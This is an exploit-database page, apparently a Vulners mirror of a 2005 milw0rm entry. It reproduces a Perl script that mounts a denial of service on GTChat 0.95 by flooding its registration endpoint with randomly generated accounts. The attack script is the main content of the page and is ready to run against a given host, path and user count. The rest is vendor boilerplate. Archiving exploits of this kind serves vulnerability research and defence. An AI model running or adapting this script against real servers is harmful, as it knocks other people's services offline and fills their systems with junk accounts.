Lucene search
K

GTChat <= 0.95 Alpha (adduser) Remote Denial of Service Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 24 Views

GTChat <= 0.95 Alpha (adduser) Remote Denial of Servic

Code

                                                # Use a high user # for best results. /str0ke

#!/usr/bin/perl
######################
# codez0red by VTECin5th #
# Feel free to modify/break this script #
# Crappy code is more effective =] #
# I accept no responsibility for misuse or abuse #
######################
# Usage: xxx.pl www.server.com /directory_to_chat/ #_of_users_to_create
######################
# Affected Software: GTChat .95
# Unaffected Software: GTChat .93
######################
use IO::Socket;
if (@ARGV &#60; 2){
print &#34;Usage:\n xxx.pl www.server.com /Path_to_GTChat/ #_of_users_to_create\n&#34;;
print &#34;Example:\n xxx.pl www.serfer.com /GTChat/cgi-bin/ 5&#34;;
exit;
}
$dir = $ARGV[1];
$numero = $ARGV[2];
$host = $ARGV[0];
$host =~ s/http\:\/\///gi;
for ($i = 1; $i &#60;= $numero; $i++) {
$rando = int(rand(234));
$randy = int(rand(12));
$whyThem = $randy . $rando . &#34;@&#34; . $randy . &#34;.com&#34;;
$whyMe = &#34;SoSorry&#34; . $rando . $randy;
$lol = &#34;$dir/chat.pl?action=register&name=$whyMe&password=$whyMe&password2=$whyMe&email=$whyThem&privateemail=0&#34;;
$ox=IO::Socket::INET-&#62;new(PeerAddr=&#62;$host,PeerPort=&#62;80,Proto=&#62;&#39;tcp&#39;) || die &#34;Oh No! You broke teh server!&#34;;
print $ox &#34;GET $lol HTTP/1.1\r\n&#34;;
print $ox &#34;Accept: */*\r\n&#34;;
print $ox &#34;Accept-Language: pt\r\n&#34;;
print $ox &#34;Accept-Encoding: gzip, deflate\r\n&#34;;
print $ox &#34;User-Agent: 1337 pwnz0r\r\n&#34;;
print $ox &#34;Host: $host\r\n&#34;;
print $ox &#34;Connection: Keep-Alive\r\n\r\n\r\n&#34;;
print &#34;currently on: $whyMe \t ($i)\n&#34;;
# Please note, this does not verify whether or not the user is actually being created.
# I assume you know how to use this script.
}
print &#34;Finished creating $numero users&#34;;
close($ox);

# milw0rm.com [2005-08-23]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
24